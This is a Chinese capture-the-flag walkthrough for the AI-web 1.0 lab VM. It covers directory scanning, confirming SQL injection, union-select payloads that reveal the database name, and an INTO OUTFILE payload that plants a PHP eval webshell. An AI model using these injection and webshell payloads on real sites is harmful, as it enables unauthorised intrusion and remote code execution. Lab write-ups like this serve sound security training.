Ai-web 1.0靶场通关攻略

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径

相关推荐
帅帅哥的兜兜9 分钟前
甘特图开发代码(测试版)
前端·javascript·甘特图
loriloy1 小时前
在Electron中通过Node-API调用DLL导出函数的完整指南
前端·javascript·electron
环能jvav大师1 小时前
Electron桌面应用开发:创建应用
前端·javascript·windows·ui·electron·前端框架
环能jvav大师1 小时前
Electron桌面应用开发:自定义菜单
开发语言·前端·javascript·windows·electron
掘金一周1 小时前
你问我答,为什么class在前端开发中不常用? | 掘金一周 3.6
前端·后端
一点一木1 小时前
SSE vs WebSocket:AI 驱动的实时通信抉择
前端·人工智能·websocket
gyc27271 小时前
快速熟悉JavaScript
开发语言·前端·javascript
没有鸡汤吃不下饭2 小时前
vue3项目实现数据字典、下拉数据缓存最佳方案,解决同一下拉数据并发多次调用接口
前端·javascript·vue.js
拉不动的猪2 小时前
刷刷题25(项目中遇到的难题,怎么解决的)
前端·javascript·面试
赔罪3 小时前
Python 面向对象高级编程-定制类
服务器·开发语言·前端·python